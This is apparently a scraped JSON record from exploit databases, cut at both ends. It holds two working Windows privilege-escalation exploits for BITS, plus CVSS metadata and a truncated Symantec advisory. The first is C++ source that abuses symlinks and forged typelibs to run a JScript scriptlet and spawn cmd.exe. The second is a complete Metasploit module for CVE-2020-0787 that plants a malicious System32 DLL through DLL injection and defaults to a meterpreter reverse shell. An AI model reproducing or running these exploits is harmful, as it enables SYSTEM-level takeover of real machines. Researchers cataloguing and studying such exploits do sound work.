__uuidof(IBackgroundCopyJob));\r\n_COM_SMARTPTR_TYPEDEF(IBackgroundCopyManager, __uuidof(IBackgroundCopyManager));\r\n \r\nstatic HRESULT Check(HRESULT hr)\r\n{\r\n if (FAILED(hr))\r\n {\r\n throw _com_error(hr);\r\n }\r\n return hr;\r\n}\r\n \r\n#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)\r\n \r\ntypedef NTSTATUS(NTAPI* fNtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);\r\ntypedef VOID(NTAPI *fRtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);\r\n \r\nFARPROC GetProcAddressNT(LPCSTR lpName)\r\n{\r\n return GetProcAddress(GetModuleHandleW(L\"ntdll\"), lpName);\r\n}\r\n \r\n \r\nclass ScopedHandle\r\n{\r\n HANDLE _h;\r\npublic:\r\n ScopedHandle() : _h(nullptr)\r\n {\r\n }\r\n \r\n ScopedHandle(ScopedHandle&) = delete;\r\n \r\n ScopedHandle(ScopedHandle&& h) {\r\n _h = h._h;\r\n h._h = nullptr;\r\n }\r\n \r\n ~ScopedHandle()\r\n {\r\n if (!invalid())\r\n {\r\n CloseHandle(_h);\r\n _h = nullptr;\r\n }\r\n }\r\n \r\n bool invalid() {\r\n return (_h == nullptr) || (_h == INVALID_HANDLE_VALUE);\r\n }\r\n \r\n void set(HANDLE h)\r\n {\r\n _h = h;\r\n }\r\n \r\n HANDLE get()\r\n {\r\n return _h;\r\n }\r\n \r\n HANDLE* ptr()\r\n {\r\n return &_h;\r\n }\r\n \r\n \r\n};\r\n \r\nScopedHandle CreateSymlink(LPCWSTR linkname, LPCWSTR targetname)\r\n{\r\n fRtlInitUnicodeString pfRtlInitUnicodeString = (fRtlInitUnicodeString)GetProcAddressNT(\"RtlInitUnicodeString\");\r\n fNtCreateSymbolicLinkObject pfNtCreateSymbolicLinkObject = (fNtCreateSymbolicLinkObject)GetProcAddressNT(\"NtCreateSymbolicLinkObject\");\r\n \r\n OBJECT_ATTRIBUTES objAttr;\r\n UNICODE_STRING name;\r\n UNICODE_STRING target;\r\n \r\n pfRtlInitUnicodeString(&name, linkname);\r\n pfRtlInitUnicodeString(&target, targetname);\r\n \r\n InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);\r\n \r\n ScopedHandle hLink;\r\n \r\n NTSTATUS status = pfNtCreateSymbolicLinkObject(hLink.ptr(), SYMBOLIC_LINK_ALL_ACCESS, &objAttr, &target);\r\n if (status == 0)\r\n {\r\n printf(\"Opened Link %ls -> %ls: %p\\n\", linkname, targetname, hLink.get());\r\n return hLink;\r\n }\r\n else\r\n {\r\n printf(\"Error creating link %ls: %08X\\n\", linkname, status);\r\n return ScopedHandle();\r\n }\r\n}\r\n \r\n \r\nbstr_t GetSystemDrive()\r\n{\r\n WCHAR windows_dir[MAX_PATH] = { 0 };\r\n \r\n GetWindowsDirectory(windows_dir, MAX_PATH);\r\n \r\n windows_dir[2] = 0;\r\n \r\n return windows_dir;\r\n}\r\n \r\nbstr_t GetDeviceFromPath(LPCWSTR lpPath)\r\n{\r\n WCHAR drive[3] = { 0 };\r\n drive[0] = lpPath[0];\r\n drive[1] = lpPath[1];\r\n drive[2] = 0;\r\n \r\n WCHAR device_name[MAX_PATH] = { 0 };\r\n \r\n if (QueryDosDevice(drive, device_name, MAX_PATH))\r\n {\r\n return device_name;\r\n }\r\n else\r\n {\r\n printf(\"Error getting device for %ls\\n\", lpPath);\r\n exit(1);\r\n }\r\n}\r\n \r\nbstr_t GetSystemDevice()\r\n{\r\n return GetDeviceFromPath(GetSystemDrive());\r\n}\r\n \r\nbstr_t GetExe()\r\n{\r\n WCHAR curr_path[MAX_PATH] = { 0 };\r\n GetModuleFileName(nullptr, curr_path, MAX_PATH);\r\n return curr_path;\r\n}\r\n \r\nbstr_t GetExeDir()\r\n{\r\n WCHAR curr_path[MAX_PATH] = { 0 };\r\n GetModuleFileName(nullptr, curr_path, MAX_PATH);\r\n PathRemoveFileSpec(curr_path);\r\n \r\n return curr_path;\r\n}\r\n \r\nbstr_t GetCurrentPath()\r\n{\r\n bstr_t curr_path = GetExeDir();\r\n \r\n bstr_t ret = GetDeviceFromPath(curr_path);\r\n \r\n ret += &curr_path.GetBSTR()[2];\r\n \r\n return ret;\r\n}\r\n \r\nvoid TestBits()\r\n{\r\n IBackgroundCopyManagerPtr pQueueMgr;\r\n \r\n Check(CoCreateInstance(__uuidof(BackgroundCopyManager), NULL,\r\n CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pQueueMgr)));\r\n \r\n IUnknownPtr pOuter = new CMarshaller(static_cast<IPersist*>(new FakeObject()));\r\n IUnknownPtr pInner;\r\n \r\n Check(CoGetStdMarshalEx(pOuter, SMEXF_SERVER, &pInner));\r\n \r\n IBackgroundCopyJobPtr pJob;\r\n GUID guidJob;\r\n Check(pQueueMgr->CreateJob(L\"BitsAuthSample\",\r\n BG_JOB_TYPE_DOWNLOAD,\r\n &guidJob,\r\n &pJob));\r\n \r\n IUnknownPtr pNotify;\r\n pNotify.Attach(new CMarshaller(pInner));\r\n {\r\n ScopedHandle link = CreateSymlink(L\"\\\\??\\\\C:\", GetCurrentPath());\r\n printf(\"Result: %08X\\n\", pJob->SetNotifyInterface(pNotify));\r\n }\r\n if (pJob)\r\n {\r\n pJob->Cancel();\r\n }\r\n printf(\"Done\\n\");\r\n}\r\n \r\nclass CoInit\r\n{\r\npublic:\r\n CoInit()\r\n {\r\n Check(CoInitialize(nullptr));\r\n Check(CoInitializeSecurity(nullptr, -1, nullptr, nullptr,\r\n RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_NO_CUSTOM_MARSHAL | EOAC_DYNAMIC_CLOAKING, nullptr));\r\n }\r\n \r\n ~CoInit()\r\n {\r\n CoUninitialize();\r\n }\r\n};\r\n \r\n// {D487789C-32A3-4E22-B46A-C4C4C1C2D3E0}\r\nstatic const GUID IID_BaseInterface =\r\n{ 0xd487789c, 0x32a3, 0x4e22,{ 0xb4, 0x6a, 0xc4, 0xc4, 0xc1, 0xc2, 0xd3, 0xe0 } };\r\n \r\n// {6C6C9F33-AE88-4EC2-BE2D-449A0FFF8C02}\r\nstatic const GUID TypeLib_BaseInterface =\r\n{ 0x6c6c9f33, 0xae88, 0x4ec2,{ 0xbe, 0x2d, 0x44, 0x9a, 0xf, 0xff, 0x8c, 0x2 } };\r\n \r\nGUID TypeLib_Tapi3 = { 0x21d6d480,0xa88b,0x11d0,{ 0x83,0xdd,0x00,0xaa,0x00,0x3c,0xca,0xbd } };\r\n \r\nvoid Create(bstr_t filename, bstr_t if_name, REFGUID typelib_guid, REFGUID iid, ITypeLib* ref_typelib, REFGUID ref_iid)\r\n{\r\n DeleteFile(filename);\r\n ICreateTypeLib2Ptr tlb;\r\n Check(CreateTypeLib2(SYS_WIN32, filename, &tlb));\r\n tlb->SetGuid(typelib_guid);\r\n \r\n ITypeInfoPtr ref_type_info;\r\n Check(ref_typelib->GetTypeInfoOfGuid(ref_iid, &ref_type_info));\r\n \r\n ICreateTypeInfoPtr create_info;\r\n Check(tlb->CreateTypeInfo(if_name, TKIND_INTERFACE, &create_info));\r\n Check(create_info->SetTypeFlags(TYPEFLAG_FDUAL | TYPEFLAG_FOLEAUTOMATION));\r\n HREFTYPE ref_type;\r\n Check(create_info->AddRefTypeInfo(ref_type_info, &ref_type));\r\n Check(create_info->AddImplType(0, ref_type));\r\n Check(create_info->SetGuid(iid));\r\n Check(tlb->SaveAllChanges());\r\n}\r\n \r\nstd::vector<BYTE> ReadFile(bstr_t path)\r\n{\r\n ScopedHandle hFile;\r\n hFile.set(CreateFile(path, GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr));\r\n if (hFile.invalid())\r\n {\r\n throw _com_error(E_FAIL);\r\n } \r\n DWORD size = GetFileSize(hFile.get(), nullptr);\r\n std::vector<BYTE> ret(size);\r\n if (size > 0)\r\n {\r\n DWORD bytes_read;\r\n if (!ReadFile(hFile.get(), ret.data(), size, &bytes_read, nullptr) || bytes_read != size)\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n }\r\n \r\n return ret;\r\n}\r\n \r\nvoid WriteFile(bstr_t path, const std::vector<BYTE> data)\r\n{\r\n ScopedHandle hFile;\r\n hFile.set(CreateFile(path, GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, 0, nullptr));\r\n if (hFile.invalid())\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n if (data.size() > 0)\r\n {\r\n DWORD bytes_written;\r\n if (!WriteFile(hFile.get(), data.data(), data.size(), &bytes_written, nullptr) || bytes_written != data.size())\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n }\r\n}\r\n \r\nvoid WriteFile(bstr_t path, const char* data)\r\n{\r\n const BYTE* bytes = reinterpret_cast<const BYTE*>(data);\r\n std::vector<BYTE> data_buf(bytes, bytes + strlen(data));\r\n WriteFile(path, data_buf);\r\n}\r\n \r\nvoid BuildTypeLibs(LPCSTR script_path)\r\n{\r\n ITypeLibPtr stdole2;\r\n Check(LoadTypeLib(L\"stdole2.tlb\", &stdole2));\r\n \r\n printf(\"Building Library with path: %s\\n\", script_path);\r\n unsigned int len = strlen(script_path);\r\n \r\n bstr_t buf = GetExeDir() + L\"\\\\\";\r\n for (unsigned int i = 0; i < len; ++i)\r\n {\r\n buf += L\"A\";\r\n }\r\n \r\n Create(buf, \"IBadger\", TypeLib_BaseInterface, IID_BaseInterface, stdole2, IID_IDispatch);\r\n ITypeLibPtr abc;\r\n Check(LoadTypeLib(buf, &abc));\r\n \r\n \r\n bstr_t built_tlb = GetExeDir() + L\"\\\\output.tlb\";\r\n Create(built_tlb, \"ITMediaControl\", TypeLib_Tapi3, IID_ITMediaControl, abc, IID_BaseInterface);\r\n \r\n std::vector<BYTE> tlb_data = ReadFile(built_tlb);\r\n for (size_t i = 0; i < tlb_data.size() - len; ++i)\r\n {\r\n bool found = true;\r\n for (unsigned int j = 0; j < len; j++)\r\n {\r\n if (tlb_data[i + j] != 'A')\r\n {\r\n found = false;\r\n }\r\n }\r\n \r\n if (found)\r\n {\r\n printf(\"Found TLB name at offset %zu\\n\", i);\r\n memcpy(&tlb_data[i], script_path, len);\r\n break;\r\n }\r\n }\r\n \r\n CreateDirectory(GetExeDir() + L\"\\\\Windows\", nullptr);\r\n CreateDirectory(GetExeDir() + L\"\\\\Windows\\\\System32\", nullptr);\r\n \r\n bstr_t target_tlb = GetExeDir() + L\"\\\\Windows\\\\system32\\\\tapi3.dll\";\r\n WriteFile(target_tlb, tlb_data);\r\n}\r\n \r\nconst wchar_t x[] = L\"ABC\";\r\n \r\nconst wchar_t scriptlet_start[] = L\"<?xml version='1.0'?>\\r\\n<package>\\r\\n<component id='giffile'>\\r\\n\"\r\n\"<registration description='Dummy' progid='giffile' version='1.00' remotable='True'>\\r\\n\"\\\r\n\"</registration>\\r\\n\"\\\r\n\"<script language='JScript'>\\r\\n\"\\\r\n\"<![CDATA[\\r\\n\"\\\r\n\" new ActiveXObject('Wscript.Shell').exec('\";\r\n \r\nconst wchar_t scriptlet_end[] = L\"');\\r\\n\"\\\r\n\"]]>\\r\\n\"\\\r\n\"</script>\\r\\n\"\\\r\n\"</component>\\r\\n\"\\\r\n\"</package>\\r\\n\";\r\n \r\nbstr_t CreateScriptletFile()\r\n{\r\n bstr_t script_file = GetExeDir() + L\"\\\\run.sct\";\r\n bstr_t script_data = scriptlet_start;\r\n bstr_t exe_file = GetExe();\r\n wchar_t* p = exe_file;\r\n while (*p)\r\n {\r\n if (*p == '\\\\')\r\n {\r\n *p = '/';\r\n }\r\n p++;\r\n }\r\n \r\n DWORD session_id;\r\n ProcessIdToSessionId(GetCurrentProcessId(), &session_id);\r\n WCHAR session_str[16];\r\n StringCchPrintf(session_str, _countof(session_str), L\"%d\", session_id);\r\n \r\n script_data += L\"\\\"\" + exe_file + L\"\\\" \" + session_str + scriptlet_end;\r\n \r\n WriteFile(script_file, script_data);\r\n \r\n return script_file;\r\n}\r\n \r\nvoid CreateNewProcess(const wchar_t* session)\r\n{\r\n DWORD session_id = wcstoul(session, nullptr, 0);\r\n ScopedHandle token;\r\n if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, token.ptr()))\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n ScopedHandle new_token;\r\n \r\n if (!DuplicateTokenEx(token.get(), TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, new_token.ptr()))\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n SetTokenInformation(new_token.get(), TokenSessionId, &session_id, sizeof(session_id));\r\n \r\n STARTUPINFO start_info = {};\r\n start_info.cb = sizeof(start_info);\r\n start_info.lpDesktop = L\"WinSta0\\\\Default\";\r\n PROCESS_INFORMATION proc_info;\r\n WCHAR cmdline[] = L\"cmd.exe\";\r\n if (CreateProcessAsUser(new_token.get(), nullptr, cmdline,\r\n nullptr, nullptr, FALSE, CREATE_NEW_CONSOLE, nullptr, nullptr, &start_info, &proc_info))\r\n {\r\n CloseHandle(proc_info.hProcess);\r\n CloseHandle(proc_info.hThread);\r\n }\r\n}\r\n \r\nint wmain(int argc, wchar_t** argv)\r\n{\r\n try\r\n {\r\n CoInit ci;\r\n if (argc > 1)\r\n {\r\n CreateNewProcess(argv[1]);\r\n }\r\n else\r\n {\r\n bstr_t script = L\"script:\" + CreateScriptletFile();\r\n BuildTypeLibs(script);\r\n TestBits();\r\n }\r\n }\r\n catch (const _com_error& err)\r\n {\r\n printf(\"Error: %ls\\n\", err.ErrorMessage());\r\n }\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-02-21] #", "sourceHref": "https://0day.today/exploit/27798", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-12-07T13:40:00", "description": "This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll with a malicious DLL containing the attacker's payload. To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking issue within the Update Session Orchestrator Service. Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested, so your mileage may vary on Windows Server 2016 and later.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-12T00:00:00", "type": "zdt", "title": "Background Intelligent Transfer Service Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787", "CVE-2020-0688"], "modified": "2020-06-12T00:00:00", "id": "1337DAY-ID-34553", "href": "https://0day.today/exploit/description/34553", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Windows::Priv\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n include Msf::Post::Windows::FileSystem\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability',\n 'Description' => %q{\n This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the\n Background Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll\n with a malicious DLL containing the attacker's payload.\n\n To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which\n will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking\n issue within the Update Session Orchestrator Service.\n\n Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the\n Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested,\n so your mileage may vary on Windows Server 2016 and later.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'itm4n', # PoC\n 'gwillcox-r7' # msf module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Privileged' => true,\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-10',\n 'References' =>\n [\n ['CVE', '2020-0787'],\n ['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'],\n ['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'],\n ['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'],\n ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],\n ['URL', 'https://itm4n.github.io/usodllloader-part1/'],\n ['URL', 'https://itm4n.github.io/usodllloader-part2/'],\n ],\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 900\n }\n )\n )\n\n register_options([\n OptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]),\n OptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds', 20])\n ])\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.\n build_num_raw = session.shell_command_token('cmd.exe /c ver')\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)\n if build_num.nil?\n print_error(\"Couldn't retrieve the target's build number!\")\n else\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0]\n print_status(\"Target's build number: #{build_num}\")\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1903)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n build_num_gemversion = Gem::Version.new(build_num)\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/\n if (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 v1809\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::AppearsAppears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def check_target_is_running_supported_windows_version\n if sysinfo['OS'].match('Windows').nil?\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil?\n fail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...')\n end\n end\n\n def check_target_and_payload_match_and_supported(client_arch)\n if (client_arch != ARCH_X64) && (client_arch != ARCH_X86)\n fail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!')\n end\n payload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere.\n if (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86)\n fail_with(Failure::BadConfig, \"Unsupported payload architecture (#{payload_arch})\") # Unsupported architecture, so return an error.\n end\n if ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86))\n fail_with(Failure::BadConfig, \"Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!\")\n end\n end\n\n def check_windowscoredeviceinfo_dll_exists_on_target\n # Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code.\n #\n # We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit.\n # The second part of this exploit will trigger a Update Session to be created so that this DLL\n # is loaded, which will result in arbitrary code execution as SYSTEM.\n #\n # To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure\n # that they want to overwrite the file.\n win_dir = session.sys.config.getenv('windir')\n normal_target_payload_pathname = \"#{win_dir}\\\\System32\\\\WindowsCoreDeviceInfo.dll\"\n wow64_target_payload_pathname = \"#{win_dir}\\\\Sysnative\\\\WindowsCoreDeviceInfo.dll\"\n wow64_existing_file = \"#{win_dir}\\\\Sysnative\\\\win32k.sys\"\n if file?(wow64_existing_file)\n if file?(wow64_target_payload_pathname)\n print_warning(\"#{wow64_target_payload_pathname} already exists\")\n print_warning('If it is in use, the overwrite will fail')\n unless datastore['OVERWRITE_DLL']\n print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')\n fail_with(Failure::BadConfig, \"#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false\")\n end\n end\n target_payload_pathname = wow64_target_payload_pathname\n elsif file?(normal_target_payload_pathname)\n print_warning(\"#{normal_target_payload_pathname} already exists\")\n print_warning('If it is in use, the overwrite will fail')\n unless datastore['OVERWRITE_DLL']\n print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')\n fail_with(Failure::BadConfig, \"#{normal_target_payload_pathname} already exists and OVERWRITE_DLL option is false\")\n end\n target_payload_pathname = normal_target_payload_pathname\n end\n target_payload_pathname\n end\n\n def launch_background_injectable_notepad\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n process\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n process\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n client_arch = sysinfo['Architecture']\n check_target_is_running_supported_windows_version\n check_target_and_payload_match_and_supported(client_arch)\n check_windowscoredeviceinfo_dll_exists_on_target\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n print_status('Step #2: Generating the malicious DLL...')\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787')\n datastore['EXE::Path'] = path\n if client_arch =~ /x86/i\n datastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll')\n library_path = ::File.expand_path(library_path)\n elsif client_arch =~ /x64/i\n datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll')\n library_path = ::File.expand_path(library_path)\n end\n\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\\" + Rex::Text.rand_text_alpha(6..13) + '.dll'\n write_file(malicious_dll_location, payload_dll)\n register_file_for_cleanup(malicious_dll_location)\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n process = launch_background_injectable_notepad\n\n print_status(\"Injecting DLL into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n dll_info_parameter = malicious_dll_location.to_s\n payload_mem = inject_into_process(process, dll_info_parameter)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('DLL injected. Executing injected DLL...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_status(\"Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...\")\n sleep datastore['JOB_WAIT_TIME']\n\n register_file_for_cleanup('C:\\\\Windows\\\\System32\\\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.\n # Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file.\n\n print_status(\"Starting the interactive scan job...\")\n # Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload\n # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.\n session.shell_command_token('usoclient StartInteractiveScan')\n\n print_status(\"Enjoy the shell!\")\n end\nend\n", "sourceHref": "https://0day.today/exploit/34553", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:05:26", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code within the context of the application.\n\n### Technologies Affected\n\n * Microsoft Windows 10 